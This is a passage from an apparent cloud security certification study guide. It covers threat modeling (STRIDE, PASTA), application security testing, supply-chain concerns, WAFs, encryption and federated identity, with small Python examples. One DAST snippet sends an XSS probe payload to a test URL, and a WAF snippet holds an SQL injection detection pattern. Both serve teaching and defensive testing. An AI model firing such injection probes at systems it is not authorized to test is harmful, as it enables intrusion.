I won’t go into the specifics of each risk again, but you should definitely check out Chapter 3 if you haven’t already. What’s important to remember is that your risks change depending upon your cloud service category. For PaaS, risks like insufficient identity, credential, access, and key management, as well as limited cloud usage visibility, are bigger concerns because you, as a cloud customer, have a lower level of access and control than you do in IaaS environments. For application developers in IaaS environments, your risk is skewed more toward misconfiguration and inadequate change control, as well as insider threat, because your users and applications generally have a higher level of access, which poses a higher level of risk if misused. When considering cloud-specific risks, make sure that you take into account how your service category affects your application’s risk posture.

Quality Assurance (QA)

Quality assurance, or QA, is the process of ensuring software quality through validation and verification activities. The role of QA in software development is to ensure that applications conform to requirements and to quickly identify any risks. QA is not testing, but rather an umbrella field that includes testing, guidance, and oversight activities throughout the entire SDLC.

QA professionals are an integral part of any application development project and should work with developers, cloud architects, and project managers to ensure a quality product is designed, developed, and delivered to the customer.

Threat modeling

Threat modeling is a technique by which you can identify potential threats to your application and identify suitable countermeasures for defense. Threats may be related to overall system vulnerabilities or an absence of necessary security controls. You can use threat modeling to help securely develop software or to help reduce risk in an already deployed application.

There are numerous approaches to threat modeling, but two of the most commonly used are called STRIDE and PASTA.

Tip In addition to STRIDE and PASTA, you may come across the DREAD threat modeling approach. DREAD is a mnemonic for five categories that require risk rating under this threat model: Damage, Reproducibility, Exploitability, Affected users, and Discoverability. Although the DREAD approach is not commonly used in practice, you should know what it is, in case it shows up on your exam.

STRIDE

STRIDE is a model developed by a team at Microsoft in 1999 to help identify and classify computer security threats. The name itself is a mnemonic for six categories of security threats. STRIDE stands for

  • Spoofing
  • Tampering
  • Repudiation
  • Information disclosure
  • Denial of service
  • Elevation of privilege

Tip STRIDE is an important acronym that helps you remember six categories of known threats to evaluate at every system or application endpoint. Remember what the STRIDE acronym stands for, as it may show up on your exam.

  • Spoofing: Spoofing is an attack during which a malicious actor assumes the identity of another user (or system) by falsifying information. A common example of identity spoofing occurs when email spammers modify the From: field to show the name of a sender that the target recipient is more likely to trust. Within applications, spoofing can occur if an attacker steals and uses a victim’s authentication information (like username and password) to impersonate and act as them within the application.
  • Tampering: Data tampering is an attack on the integrity of data by intentionally and maliciously manipulating data. Tampering can include altering data on disk, in memory, over the network, or elsewhere. Within cloud and other web-based applications, tampering attacks generally target the exchange between your application and the client. Tampering with a cloud application can lead to modification of user credentials or other application data by a malicious user or a third party conducting a man-in-the-middle attack. Applications that don’t properly validate user input may allow malicious users to modify values for personal gain (decreasing the price of an item in their shopping cart, for example) and have the manipulated data stored and used by the application.
  • Repudiation: I introduce the concept of nonrepudiation in Chapter 4. The opposite concept, repudiation, is the ability of a party to deny that they are responsible for performing some action. A repudiation threat occurs when a user claims that they did not perform an action, and no other party is able to prove otherwise. In the real world, signing for a package delivery is a common form of nonrepudiation — the delivery company maintains a physical record that you received and accepted the package on a specific date. In applications, an example of a repudiation threat is a user claiming that they did not make an online purchase. Your organization may have just given away a free item if your application does not have controls to prove that the user did indeed complete the purchase. It is essential that your applications maintain comprehensive logs of all user actions that face this threat. Controls like digital signatures and multifactor authentication can be integrated into certain applications to provide additional nonrepudiation for high-risk actions.
  • Information disclosure: Information disclosure is what happens during a data breach — information is shared with someone who should not have access to it. This threat compromises the confidentiality of data and carries a great deal of risk depending on the sensitivity of the leaked data. You should focus a great deal of attention on protecting against this threat in applications that store PII, PHI, financial information, or other information with high privacy requirements. Data encryption, strong access control, and other data protection mechanisms are the keys to protection here.
  • Denial of service: I talk about DoS throughout much of this book. A DoS attack denies access to legitimate users. Any application is a potential DoS target — and, even with the high availability provided by cloud infrastructures, cloud developers must still remain aware of this threat. Controls should be put in place to monitor and detect abnormally high resource consumption by any single user, which may be an indication of either malicious or unintentional resource exhaustion. As a principle, applications should be developed with availability and reliability in mind.
  • Elevation of privilege: Elevation of privilege (or privilege escalation) comes last in the STRIDE acronym, but is one of the highest risk items on this list. Elevation occurs when an unprivileged (or regular) application user is able to upgrade their privileges to those of a privileged user (like an administrator). Elevation of privilege can give an untrusted party the keys to the kingdom and grant them access to and control over sensitive data and systems. Strong access control is critical to protecting against this threat. Applications must require reverification of a user’s identity and credentials prior to granting privileged access, and multifactor authentication should be used, wherever possible.

PASTA

Most people would be surprised to hear that spaghetti and linguini can help secure their cloud environments. I would be surprised, too — that’s just silly! The Process for Attack Simulation and Threat Analysis (PASTA) is a risk-based threat model, developed in 2012, that supports dynamic threat analysis. The PASTA methodology integrates business objectives with technical requirements, application risks, and attack modeling. This attacker-centric perspective of the application produces a mitigation strategy that includes threat enumeration, impact analysis, and scoring.

The PASTA methodology has seven stages:

  1. Define objectives.

    During this step, you define key business objectives and critical security and compliance requirements. In addition, you perform a preliminary business impact analysis (BIA) that identifies potential business impact considerations.

  2. Define technical scope.

    You can’t protect something until you know it exists and needs protecting. During this step, you document the boundaries of the technical environment and identify the scope of all technical assets that need threat analysis. In addition to the application boundaries, you must identify all infrastructure, application, and software dependencies. The goal is to capture a high-level, but comprehensive, view of all servers, hosts, devices, applications, protocols, and data that need to be protected.

  3. Perform application decomposition.

    This step requires you to focus on understanding the data flows between your assets (in other words, the application components) and identify all application entry points and trust boundaries. You should leave this step with a clear understanding of all data sources, the parties that access those data sources, and all use cases for data access within your application — basically, who should perform what actions on which components of your application.

  4. Complete a threat analysis.

    In this step, you review threat data from within your environment (SIEM feeds, WAF logs, and so on) as well as externally available threat intelligence that is related to your application (for example, if you run a banking app, numerous resources are available to learn about emergent cyber threats to financial services companies). You should be seeking to understand threat-attack scenarios that are relevant to your specific application, environment, and data. At the end of this stage, you should have a list of the most likely attack vectors for your given application.

  5. Conduct a vulnerability analysis.

    During this step, you focus on identifying all vulnerabilities within your code and correlating them to the threat-attack scenarios identified in Step 4. You should be reviewing your OS, database, network, and application scans, as well as all dynamic and static code analysis results, to enumerate and score existing vulnerabilities. The primary output of this stage is a correlated mapping of all threat-attack vectors to existing vulnerabilities and impacted assets.

  6. Model attacks.

    During this stage, you simulate attacks that could exploit identified vulnerabilities from Step 5. This step helps determine the true likelihood and impact of each identified attack vector. After this step, you should have a strong understanding of your application’s attack surface (for example, what bad things could happen to which assets within your application environment).

  7. Conduct a risk and impact analysis.

    During this final stage, you take everything you’ve learned in the previous stages and refine your BIA. You also prioritize risks that need remediation and build a risk mitigation strategy to identify countermeasures for all residual risks.

Software configuration management and versioning

The final phase of the SDLC involves maintaining an application after deployment for the full lifetime of the application. A big part of ongoing software maintenance is configuration management and application versioning. Configuration management is the process of tracking and controlling configuration changes to systems and software. Versioning is the process of creating and managing multiple releases of an application, each with the same general function but incrementally improved or otherwise updated.

Configuration management is a major consideration for any development team in any environment. Ensuring that systems and applications remain properly configured and in harmony with one another is an important challenge. In cloud environments, where systems freely spin up and down and resources can be rapidly provisioned on the fly, configuration management becomes an even greater concern for developers and security professionals alike. Whereas traditional data center environments usually involve configuration updates being made directly on each server, cloud environments operate at massive scale that makes this task nearly impossible — and cloud customers typically lack the access or control to directly manage these systems anyway. Instead, in cloud environments, address configuration management by building and managing software images that are updated, tested, and deployed throughout the customer’s cloud environment. To maintain consistent configuration management and software versions, cloud developers should generally seek to use automated tools and processes.

For tracking source code changes throughout the SDLC, developers can use version-control tools like Git (https://git-scm.com) or Apache Subversion (https://subversion.apache.org). Both of these tools are open source version-control systems that are used by large and small organizations to manage their code development and releases.

A bevy of open source and commercial tools are available for maintaining system configurations and software versions. Aside from the tools and features built into most CSP offerings, developers often flock to solutions like Ansible (https://www.ansible.com), Puppet (https://puppet.com), and Chef (https://www.chef.io). These tools enable a process known as Infrastructure as Code (IaC) that allows developers to view and manipulate their IT environments directly from lines of code using a programming or configuration language. Developers can use these tools to monitor and maintain system and application configurations, which allows centralized configuration management across their entire environment.
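
The automation these tools provide boils down to comparing a declared desired state against what’s actually running and correcting the difference. The toy sketch below shows the idea of drift detection in plain Python; real IaC tools express the desired state in their own declarative formats and handle remediation for you, and the configuration keys shown are hypothetical.

# Desired configuration, as it might be declared in version-controlled code
desired = {
    "tls_min_version": "1.2",
    "public_access": False,
    "log_retention_days": 365,
}

# Actual configuration, as it might be reported by a cloud API
actual = {
    "tls_min_version": "1.0",
    "public_access": False,
    "log_retention_days": 30,
}

def detect_drift(desired, actual):
    """Return settings whose live value differs from the declared value."""
    return {
        key: (value, actual.get(key))
        for key, value in desired.items()
        if actual.get(key) != value
    }

print(detect_drift(desired, actual))
# {'tls_min_version': ('1.2', '1.0'), 'log_retention_days': (365, 30)}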

Many other code and configuration management tools (both open source and commercial) are available, including options offered directly by some CSPs. Your organization should carefully consider your business and technical needs to determine which tool(s) work best for your software development.

Applying Cloud Software Assurance and Validation

Having a mature SDLC process is really important. Testing, auditing, and verifying that your SDLC process is producing secure applications that function as intended is just as important. In this section, you learn about functional testing and explore various application security testing methodologies.

Functional testing

Functional testing is a type of software testing that evaluates individual functions, features, or components of an application rather than the complete application as a whole. Functional testing is considered black box testing and works by feeding the tested function an appropriate input and comparing the output against functional requirements. This type of testing does not evaluate the actual source code or the processing within the application, but instead is concerned only with the results of the processing. Because functional testing is used to test various aspects of an application, the types of tests are wide-ranging. Examples of some functional tests include unit testing, component testing, integration testing, regression testing, user acceptance testing, and several others.

Technical stuff Black box testing is a software testing method in which the internal design of the component being tested is not known by the tester. White box testing is the opposite method and involves granting the tester complete knowledge of the tested component’s inner workings. Black box tests are used in cases where knowledge of the internal design is not needed for testing or in situations where you want test results that mimic those of a complete outsider. White box testing is more exhaustive and time-consuming, but it allows testers to expose more weaknesses because they’re given information that lets them design tests specifically for a given application.

Functional testing within cloud environments has all of the same considerations as traditional data center environments and then some. Because you’re operating in an environment with shared responsibility (between the CSP and cloud customer), developers must perform functional testing to evaluate the application’s compliance with all legal and regulatory obligations. You must consider how multitenancy, geographic distribution, and other cloud-specific attributes impact your specific testing needs.

Security testing methodologies

Before deployment and on an ongoing basis, cloud developers should use several application security testing methodologies to find and remediate weaknesses in their applications. For the most part, the methodologies described in the following sections align with security testing practices in traditional data center environments, but practical application of each methodology may differ due to the characteristics of cloud architectures.

Static application security testing (SAST)

Static application security testing (SAST), or static code analysis, is a security testing technique that involves assessing the security of application code without executing it. SAST is a white box test that involves examining source code or application binaries to detect structural vulnerabilities within the application. SAST tools and processes can help you detect things like memory overflows that are otherwise hard for humans to detect. Because they analyze source code, your development team must be sure to find and use a SAST tool that works with your particular development environment and your application’s programming language.
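
Real SAST tools are far more sophisticated, but a toy example shows the core idea of analyzing code without executing it. The sketch below uses Python’s built-in ast module to flag calls to eval, a construct many static analyzers warn about; the sample source line is invented and is parsed, never run.

    import ast

    SAMPLE_SOURCE = "result = eval(user_input)"   # code under review, not executed here

    def find_eval_calls(source):
        """Statically scan source code (without running it) for calls to eval()."""
        findings = []
        for node in ast.walk(ast.parse(source)):
            if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
                if node.func.id == "eval":
                    findings.append(f"line {node.lineno}: call to eval()")
        return findings

    print(find_eval_calls(SAMPLE_SOURCE))   # ['line 1: call to eval()']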

Dynamic application security testing (DAST)

Dynamic application security testing (DAST), or dynamic code analysis, involves assessing the security of code during execution. DAST seeks to uncover vulnerabilities by running an application and simulating attacks against it. By examining the application’s reaction, you are able to determine whether it’s vulnerable. For cloud applications, DAST scanners run against web URLs or REST APIs and search for vulnerabilities like injection flaws, XSS, and so on. DAST scanners exercise applications much as a typical user would and often require application credentials in order to run.

DAST is considered a black box test because testing is performed strictly from outside the application, with no intimate knowledge of the application’s code or inner workings.
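
The sketch below captures the flavor of one DAST-style probe, assuming the third-party requests library and a hypothetical test URL that you are authorized to scan: it submits a script tag in a query parameter and flags the page if the payload comes back unescaped, a classic sign of reflected XSS. Real DAST scanners run thousands of such probes.

    import requests

    TARGET = "https://test.example.com/search"    # hypothetical endpoint you own
    PAYLOAD = "<script>alert(1)</script>"

    # Exercise the running application the way a scanner (or attacker) would
    response = requests.get(TARGET, params={"q": PAYLOAD}, timeout=10)

    if PAYLOAD in response.text:
        print("Possible reflected XSS: payload echoed back unescaped")
    else:
        print("Payload not reflected verbatim; no finding from this probe")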

Vulnerability scanning

Vulnerability scanning is the process of assessing an application or system for known weaknesses. This process usually involves using a tool to run tests on servers, networks, or applications that look for signatures matching known malware, misconfigurations, and other system vulnerabilities. Vulnerability scan tools typically generate reports that list all discovered vulnerabilities, rated by severity (for example, high, moderate, low). In cloud environments, your service category (IaaS, PaaS, or SaaS) determines your scanning responsibilities. For all service categories, the CSP is responsible for scanning (and patching) the underlying cloud infrastructure. For IaaS deployments, customers are typically responsible for vulnerability scanning their virtual machine instances and database instances. SaaS customers generally leave vulnerability management activities up to their cloud provider, while PaaS customers’ responsibilities vary based on the types of PaaS services in use. You should consult your CSP’s customer responsibility matrix, user guide, or other relevant documentation to determine what responsibility you have for conducting vulnerability scans.
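
Scanner output formats vary widely, but most tools can export findings with a severity rating. Purely as an illustration of triaging such a report, here’s a minimal sketch that counts findings by severity from a hypothetical JSON export; the file name and field names are assumptions, not any particular scanner’s schema.

    import json
    from collections import Counter

    # Hypothetical export: a list of findings, each with a "severity" field
    with open("scan_results.json") as f:
        findings = json.load(f)

    by_severity = Counter(item["severity"].lower() for item in findings)

    for level in ("high", "moderate", "low"):
        print(f"{level}: {by_severity[level]} finding(s)")

    # High-severity findings typically drive the remediation and patching schedule
    high_risk = [item for item in findings if item["severity"].lower() == "high"]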

Penetration testing

Penetration testing (or pentesting) is the process of conducting a simulated attack on a system or application in order to discover exploitable vulnerabilities. A pentest may be a white box test, but it is usually a black box exercise during which the tester uses tools and procedures similar to those of a malicious attacker. The objective of a penetration test is for the good guys to discover exploitable vulnerabilities before the bad guys do. In doing so, pentests provide insight into high-risk security flaws within an application and highlight the potential impact if those flaws were exploited.

Warning Please do not confuse vulnerability scans with penetration tests; I’ve seen this done, and it’s a big red flag for me whenever a security professional uses them interchangeably. Vulnerability scans are generally automated, whereas penetration tests are manually performed by a security professional with expertise in conducting cyber attacks. Conducting a vulnerability scan requires you to use your selected scanning tool to search your application for vulnerabilities. Vulnerability scanning is typically an early part of conducting a penetration test, but the pen test takes it further by actually trying to exploit the discovered vulnerabilities to determine how much damage can be done; a pentester will try to steal data, shut off services, and more.

Using Verified Secure Software

A key aspect of software development is understanding your development environment and the components that make up your software application. Using verified secure software is critical in any environment, but it’s even more important in cloud environments, which are often composed of or connected with many different components that are not completely within your control. In this section, you explore the use of approved APIs, management of your cloud development supply chain, and the benefits and risks associated with open source software.

Approved Application Programming Interfaces (API)

In cloud computing, APIs are powerful mechanisms by which cloud providers expose functionality to developers. APIs provide cloud developers an interface they can use to programmatically access and control cloud services and resources. With great power comes great responsibility, and APIs are a great example of that. The security of APIs plays a big role in the overall security of cloud environments and their applications. Consuming or leveraging unapproved APIs can lead to insecure applications and compromised data.

As a CCSP, you must ensure that your organization builds a formal process for testing and approving all APIs prior to use. Any significant changes to an API, whether vendor updates or security vulnerabilities, should prompt additional review of the API before further use. API testing should ensure that the API is secured appropriately depending upon the type of API it is. Testing an API’s security includes ensuring that the REST or SOAP API uses secure access methods, enables sufficient logging, and encrypts communications where applicable.
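
Parts of an approval review can be automated and rerun whenever an API changes. The sketch below, assuming the third-party requests library and a hypothetical REST endpoint, checks two of the basics mentioned above: that the API rejects unauthenticated calls and that it is only addressed over HTTPS. A real approval process goes much deeper than this.

    import requests

    API_URL = "https://api.example.com/v1/orders"   # hypothetical endpoint

    # An unauthenticated request should be rejected, not quietly served
    resp = requests.get(API_URL, timeout=10)
    assert resp.status_code in (401, 403), "API served a response without credentials!"

    # Communications should be encrypted; a plain-HTTP endpoint is an immediate red flag
    assert API_URL.startswith("https://"), "API is not being accessed over HTTPS"

    print("Basic access and transport checks passed")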

Supply-chain management

It is increasingly common for companies to integrate pieces of code or entire applications from other organizations into their own applications. Cloud applications, in particular, tend to be composed of multiple external components and API calls. They often leverage software or data sources from one or more cloud providers as well as other external sources. It is essential that organizations consider the security implications whenever they use software components outside of their organizational control.

In many cases, developers rely on third-party software components that they don’t completely understand; they may need the functionality that an external component offers, but they haven’t validated that the component has been securely developed and tested in accordance with the organization’s policies and requirements. It is critical that your organization assess all external services, applications, and components to validate their secure design and proper functioning before integrating them into your own applications.

Third-party software management

While supply-chain management is focused on securely managing your use of third-party applications, you should also assess your organization’s use of third parties to manage parts of your software. Examples include third-party patch management, third-party encryption software, and third-party access management solutions. Third-party software management goes both ways: You must carefully assess your organization’s implementation of external software and also perform due diligence on your use of third-party providers who help manage your own software, including cloud providers.

Validated open source software

Open source software is widely used by individuals and organizations alike. In cloud environments, developers rely heavily on open source applications, libraries, and tools to build their own software. Open source software is often considered to be more secure than closed source software because its source code is publicly available and heavily reviewed and tested by the community. Popular open source software often garners so much attention and scrutiny that security bugs are found and patched much more quickly than in comparable proprietary software.

Despite the popular belief that open source software offers many security benefits, some organizations (government agencies, for example) are a little more skeptical and cautious when it comes to open source software. Every organization should carefully assess any software component — open source or proprietary — and determine its suitability for application development and usage.

Comprehending the Specifics of Cloud Application Architecture

Developing cloud applications involves more than a development environment and your application code. Cloud application architecture requires supplemental security components from your cloud infrastructure and a combination of technologies like cryptography, sandboxing, and application virtualization. You can explore these concepts throughout this section.

Supplemental security components

I introduce the topic of defense-in-depth in Chapter 2, and it’s a critical theme throughout much of this book. When developing applications, it’s important not to rely solely on the application itself for security. Following a defense-in-depth approach, your application architecture should include multiple layers of security controls that protect different aspects of your applications in different ways. The additional layers of security components serve to supplement the security already built into your application development.

Firewalls

Firewalls are a core security component in both traditional IT environments and cloud infrastructures. These foundational components are traditionally physical devices located at strategic points throughout a network to limit and control the flow of traffic for security purposes. In cloud environments, however, customers aren’t able to just walk into a CSP’s data center and install their own firewalls. As such, cloud customers rely on virtual firewalls to manage traffic to, from, and within their networks and applications. Most CSPs offer virtualized firewall functionality, and many vendors of traditional firewall appliances now produce software-based firewalls for cloud environments. These virtual firewalls can be used with any cloud service model (IaaS, PaaS, or SaaS) and can be managed by the customer, CSP, or a third party.

Web application firewalls (WAFs)

A web application firewall (WAF) is a security appliance or application that monitors and filters HTTP traffic to and from a web application. Unlike regular firewalls, WAFs are layer-7 devices that are actually able to understand and inspect HTTP traffic and can be used to apply rules to communication between clients and the application server. WAFs are typically used to protect against XSS, SQL injection, and other application vulnerabilities listed in the OWASP Top 10 (discussed in the “Common vulnerabilities during development” section of this chapter).

WAFs are highly configurable, and their rules must be carefully developed to fit your specific application and use-case; an overly sensitive WAF can lead to inadvertent Denial of Service, while weak WAF rules may not filter bad traffic. Cloud security professionals and application developers must work together to ensure that WAF rules are configured for security without loss of functionality.
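
Commercial WAFs ship with large, tuned rule sets, but a toy rule illustrates the trade-off described above: match too broadly and you block legitimate users, match too narrowly and attacks slip through. The sketch below is a deliberately simplistic, hypothetical check for one classic SQL injection pattern in a query string; it is nowhere near production-grade.

    import re

    # One oversimplified "rule": a tautology-style SQL injection pattern
    SQLI_RULE = re.compile(r"'\s*or\s*'?1'?\s*=\s*'?1", re.IGNORECASE)

    def waf_allows(query_string):
        """Return True if the request should be forwarded to the application."""
        return not SQLI_RULE.search(query_string)

    print(waf_allows("q=cloud+security"))    # True  -> forwarded
    print(waf_allows("id=1' OR '1'='1"))     # False -> blocked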

Malware and threat protection

Malware protection dates back to the earliest days of the Internet, when every business and personal computer needed a good antivirus program to keep it safe from the latest Trojan horse or backdoor virus. Things have evolved quite a bit since then, but the fundamental purpose of malware protection remains the same. In modern computing, malware protection is often coupled with threat intelligence and protection. Together, malware and threat protection help intelligently discover zero day vulnerabilities and other threats to cloud applications before they can be exploited. A good malware and threat protection solution correlates your cloud environment’s existing log infrastructure with other data sources, including externally provided threat intelligence. In doing so, these solutions help organizations proactively identify high-risk users, actions, and configurations that could lead to data loss or compromise if left undetected. Companies like Palo Alto Networks, NortonLifeLock (formerly Symantec), and others offer malware and threat protection solutions for cloud-based applications.

Technical stuff A zero day vulnerability is a security flaw that is so new that the software developer has yet to create a patch to fix it.

Cryptography

Encryption is a central component of every cloud security strategy, as you read throughout this book. In cloud application architectures, encryption plays a huge role in securing data at rest and data in transit.

Application encryption at rest involves encrypting sensitive data at the file/object, database, volume, or entire instance level. Encryption at the file/object or database level allows customers to encrypt only their most sensitive information or data that has specific regulatory requirements around encryption. Volume encryption is similar to disk encryption in noncloud environments and involves encrypting the entire volume (or drive) and all of its contents. Instance encryption protects the entire virtual machine, its volumes, and all of its data; instance encryption protects all of an application’s data, both at runtime and when the instance is at rest on disk.
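
CSPs handle volume and instance encryption for you once it’s enabled, but file/object-level encryption often happens in your own application code before the data is stored. Here’s a minimal sketch, assuming the third-party cryptography package, that encrypts a file’s contents with a symmetric key before upload; in practice the key would come from a key management service rather than being generated inline, and the file name is a placeholder.

    from cryptography.fernet import Fernet

    # In production, fetch this key from a KMS or secrets manager; never hardcode it
    key = Fernet.generate_key()
    cipher = Fernet(key)

    with open("customer_report.csv", "rb") as f:      # hypothetical sensitive file
        plaintext = f.read()

    ciphertext = cipher.encrypt(plaintext)

    with open("customer_report.csv.enc", "wb") as f:
        f.write(ciphertext)                           # store/upload the encrypted object

    # Later, the same key recovers the data: cipher.decrypt(ciphertext)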

Encryption in transit typically involves either TLS or VPN technologies; both are discussed in Chapter 2. TLS encrypts traffic within an application and between an application server and a client’s browser. Using TLS helps maintain the confidentiality and integrity of data as it moves across a network. A VPN creates a secure network tunnel between the client and the application, effectively bringing the client’s machine into the trusted boundary of the application. VPNs may use the TLS protocol, but take security a step further by creating a private channel for all communications rather than merely encrypting individual data components.
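
On the client side, most of the TLS work is done by your HTTP library; your main job is not to weaken it. The sketch below, using only Python’s standard library and a hypothetical application URL, builds a default TLS context, insists on TLS 1.2 or newer, and leaves certificate verification switched on (which is the default and should stay that way).

    import ssl
    import urllib.request

    context = ssl.create_default_context()              # verifies server certificates
    context.minimum_version = ssl.TLSVersion.TLSv1_2    # refuse older, weaker protocol versions

    with urllib.request.urlopen("https://app.example.com/health", context=context) as resp:
        print(resp.status)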

Sandboxing

Sandboxing is the process of isolating an application from other applications and resources by placing it in a separate environment (the sandbox). By isolating the application, errors or security vulnerabilities in that application are also isolated within the sandbox, thus protecting the rest of the environment from harm. Sandboxes can either mirror the full production environment or be limited to a stripped-down set of resources and are commonly used to run untrusted (or untested) code and applications in a safe manner. Sandboxing is tremendously important in cloud environments, where customers don’t have the ability to physically separate resources.

Tip As you may imagine, virtual machines serve as a great mechanism for cloud customers to create sandboxes. Just be mindful that your virtual firewalls, access controls, and other configuration settings appropriately isolate traffic from your sandbox VM to the rest of your environment.

Application virtualization and orchestration

Application virtualization and orchestration are key concepts that center around bundling and using application components, but with different purposes.

Application virtualization

Application virtualization is the process of encapsulating (or bundling) an application into a self-contained package that is isolated from the underlying operating system on which it is executed. This form of sandboxing allows the application to run on a system without needing to be installed on that system, which enables running the target application on virtually any system — even ones with operating systems that the application wasn’t built to run on. From the user’s perspective, the application works just as if it were running on its native OS, much like hypervisors trick virtual machines into thinking they’re running directly on hardware.

Application virtualization benefits cloud users by providing the ability to test applications in a known environment without posing risk to the rest of the environment. In addition, application virtualization allows applications to run in environments that they couldn’t function in natively — for example, running Windows applications on a Mac, or vice versa. Another notable benefit to cloud customers is that application virtualization uses fewer resources than virtual machines, as only the bare minimum resources needed to operate the application are bundled into the virtualized application.

It should come as no surprise that where there are benefits, there are also drawbacks or things to consider. Developers should be aware that applications that require heavy integration with the OS or underlying hardware are not suitable for virtualization. Additionally, application virtualization adds considerable software licensing challenges — both the virtualized application and its host system must be correctly licensed.

Application orchestration

Application (or service) orchestration is the process of bundling and integrating two or more applications or services to automate a process. Orchestration involves configuring, managing, and coordinating a workflow between multiple systems and software components in an automated fashion. The objective of orchestration is to use automation to align your technology stack with a particular set of business needs or requirements. By automating the configuration and management of disparate applications and services, orchestration allows organizations to spend less time managing important, yet time intensive tasks.

Remember Orchestration may sound like it’s simply the same as automation, but the terms are not synonymous. Automation generally refers to a single task, whereas orchestration is how you automate an entire workflow that involves several tasks across multiple applications and systems.

Orchestration can be used to automate many different processes. In cloud environments, orchestration can be used to provision resources, create virtual machines, and carry out several other tasks and workflows. Several CSPs offer cloud orchestration services, with AWS CloudFormation being among the most popular.

Designing Appropriate Identity and Access Management (IAM) Solutions

Managing and controlling access to your application and its data is front and center when it comes to application security. Identity and access management (IAM) solutions help you uniquely identify users, assign appropriate permissions to those users, and grant or deny access to those users, based on their permissions. Several components make up an IAM solution. I introduce the foundations of identification, authentication, and authorization in Chapter 5. In this section, you explore these topics further.

Federated identity

The concept of identity federation (discussed in Chapter 5) is pivotal in cloud environments, where customers often manage user identities across multiple systems (on-prem and cloud-based). Federated identity means that a user’s (or system’s) identity on one system is linked with their identity on one or more other systems. A federated identity system allows reciprocal trust access across unrelated systems and between separate organizations.

Federated identity management is enabled by having a common set of policies, standards, and specifications that member organizations share. This common understanding forms the basis for the reciprocal trust between each organization and establishes mutually agreed-upon protocols for each organization to communicate with one another. Organizations use multiple common standards (or data formats) to meet their federated identity goals. SAML, OAuth, and OpenID are the most common, and are discussed in the following sections.

Security Assertion Markup Language (SAML)

Security Assertion Markup Language, or SAML, is an XML-based open standard used to share authentication and authorization information between identity providers and service providers. In short, SAML is a markup language (that’s the ML) used to make security assertions (there’s the SA) about a party’s identity and access permissions. In a federated system, the service provider (or the application being accessed) redirects the user’s access request to an identity provider. The identity provider then sends SAML assertions to the service provider that include all the information the service provider needs to identify and authorize the user’s access.

SAML is managed by a global nonprofit consortium known as OASIS (or the Organization for the Advancement of Structured Information Standards), which adopted SAML 2.0 in 2005.
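
To make the exchange slightly more concrete, the sketch below parses a heavily simplified, hypothetical SAML assertion with Python’s standard xml library and pulls out the subject’s NameID, which is the kind of information a service provider reads from the identity provider’s response. Real assertions are much larger, carry conditions and attribute statements, and are digitally signed and validated with a dedicated SAML library.

    import xml.etree.ElementTree as ET

    NS = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion"}

    # A toy, unsigned assertion fragment (illustration only, not schema-complete)
    assertion_xml = (
        '<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">'
        "<saml:Subject><saml:NameID>alice@example.com</saml:NameID></saml:Subject>"
        "</saml:Assertion>"
    )

    root = ET.fromstring(assertion_xml)
    name_id = root.find("./saml:Subject/saml:NameID", NS)
    print("Authenticated subject:", name_id.text)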

OAuth

OAuth is an open standard that applications can use to provide clients with secure access delegation. In other words, OAuth works over HTTPS (secure) and issues access tokens rather than using credentials (like username and password) to authorize applications, devices, APIs, and so on. You might see OAuth in action with applications like Google or Facebook, which use OAuth to allow you to share certain information about your account with third parties without sharing your credentials with that third party.

OAuth 2.0 was released in 2012 and is the latest version of the OAuth framework. It’s important to note that OAuth 1.0 and OAuth 2.0 are completely different, cannot be used together, and do not share backwards compatibility.
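
The sketch below shows one common OAuth 2.0 pattern, the client credentials grant, assuming the third-party requests library and a hypothetical authorization server: the application exchanges its client ID and secret for a short-lived access token and then presents that token (never the underlying credentials) to the API. User-facing flows, such as the authorization code grant, follow the same token-based idea.

    import requests

    TOKEN_URL = "https://auth.example.com/oauth2/token"   # hypothetical endpoints
    API_URL = "https://api.example.com/v1/reports"

    # Exchange client credentials for a short-lived access token
    token_response = requests.post(
        TOKEN_URL,
        data={
            "grant_type": "client_credentials",
            "client_id": "my-app-id",            # placeholders; store real secrets securely
            "client_secret": "my-app-secret",
        },
        timeout=10,
    )
    access_token = token_response.json()["access_token"]

    # Call the API with the token instead of the credentials themselves
    api_response = requests.get(
        API_URL,
        headers={"Authorization": f"Bearer {access_token}"},
        timeout=10,
    )
    print(api_response.status_code)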

OpenID

OpenID is an open standard and a decentralized authentication protocol that allows users to authenticate to participating applications (known as relying parties). OpenID allows users to log in to multiple separate web applications using just one set of credentials. Those credentials may be a username and password, smart cards, or other forms of authentication. Relying parties that participate in the OpenID community are thus able to handle user identification and authentication without operating their own IAM systems.

Cloud developers can leverage the OpenID standard as a free identification and authentication mechanism for their applications. In doing so, developers allow users of their application to sign in using an existing account and credentials.

The OpenID Foundation is a nonprofit standards development organization that oversees and promotes the OpenID framework. The most recent OpenID standard is OpenID 2.0, which was published in 2007.

Identity providers

In a federated system, an identity provider is a trusted third-party organization that stores user identities and authenticates your credentials to prove your identity to other services and applications. If you’ve ever visited a retail website and been prompted to “Sign in with Facebook,” then you have seen a real-life identity provider in action. In this example, Facebook serves as the online store’s trusted identity provider and uses your Facebook account info to authenticate you on behalf of that retailer. Instead of Facebook passing your account info to the retailer, it uses your verified Facebook credentials to tell the retailer that you are who you say you are. This verification saves you the trouble of creating a new account just to buy that pair of jeans and saves the retailer the trouble of storing and securing your account information; everybody wins!

Tons of identity providers work on-prem and in the cloud. Some popular identity providers include (in no particular order)

  • Ping Identity
  • Okta Identity Management
  • OneLogin
  • Google Cloud Identity
  • Azure Active Directory
  • AWS IAM

Using a trusted identity provider can offer a lot of security benefits. Not only does it offload the need for your application to manage user identities, but it also provides a centralized audit trail for all access to your application; reliable identity providers keep a historical record of all access events, which is a major benefit when demonstrating compliance with various regulatory requirements. In addition, a good identity provider provides robust security around its identity management systems, allowing your development team to focus more on creating great applications and less on foundational access security. Whether your organization uses an identity provider or manages identities internally, it’s important that you give strong consideration to application identity management as part of your cloud security strategy.

Single sign-on (SSO)

Single sign-on, commonly referred to as SSO, is an access control property that allows a single user authentication to be used to sign on to multiple separate, but related applications. SSO allows a user to authenticate a single time to a centralized identity provider and then use tokens from that authentication to access other applications and systems without repeatedly signing in.

Remember SSO sounds a lot like federated identity — and while they’re related concepts, they are not the same! SSO enables a single authentication to allow access to multiple systems within a single organization. Federated identity extends this principle by enabling a single set of credentials to allow access to multiple systems across multiple different organizations; with federated identity, you may have to enter your credentials more than once, but it will be the same set of credentials across all participating systems. Both SSO and federated identity function by using identity tokens, but federated identity relies heavily on the principle of mutual trust between separate organizations.

